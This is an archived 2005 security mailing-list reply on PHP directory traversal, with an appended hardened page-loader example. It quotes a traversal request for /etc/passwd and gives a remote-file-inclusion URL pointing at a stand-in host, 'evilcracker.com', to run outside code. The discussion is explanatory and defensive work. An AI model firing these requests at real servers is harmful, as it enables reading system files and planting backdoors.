WebApp Sec mailing list archives

Re: PHP Directory Transversal


From: John GALLET <john.gallet () wanadoo fr>
Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)

Hi there,

Therefore, I tried doing a 
www.example.com/static.php?page=../../../../../../etc/passwd
but I get an error saying that file doesn't exist.
I use the same source code in my server, and I could retrieve the 
file...what can be happening? I don't think it is under a chroot jail...

What you can or can not read depends on the configuration of php 
(include_path vs safe mode for example). Have a look at: 
http://fr3.php.net/features.safe-mode

Now the real risk is not so much reading some source code as executing 
some other people's code. 

www.example.com/static.php?page=http://evilcracker.com/evil_code.txt 
has good chances of also getting executed, which opens the path to 
install any backdoor, download perl scripts/trojans, etc...

HTH
JG
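
A hardened form of the kind of page loader this message discusses, as an added example that is not part of the original post or the poster's code. The script name static.php and the page parameter come from the thread; the pages/ directory, the page map and the function name resolve_page are assumptions.

```php
<?php
// Hypothetical static.php: the thread does not show the real source.
//
// Pattern the thread implies (kept as a comment only):
//     include($_GET['page']);
// The request value reaches include() unchanged, so "../" sequences are
// honoured and, where PHP is configured to allow URL includes, so are URLs.

// Hardened form: the request value only selects a key from a fixed map
// and never becomes part of a file-system path or a URL.
const PAGES_DIR = __DIR__ . '/pages';   // assumed content directory
const PAGES = [                         // constructed sample entries
    'home'    => 'home.html',
    'about'   => 'about.html',
    'contact' => 'contact.html',
];

function resolve_page($requested): ?string
{
    // ?page[]=x arrives as an array, so reject anything that is not a string
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;                    // directory or file is missing
    }
    // Defence in depth: the resolved path must stay under the base
    // directory, which also catches a symlink planted inside pages/
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
// Static content is sent as data with readfile(), not include()d,
// so nothing in the file is ever parsed as PHP
readfile($path);
```

With this loader both requests quoted in the message return the 404 branch, because neither value is a key in the map.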



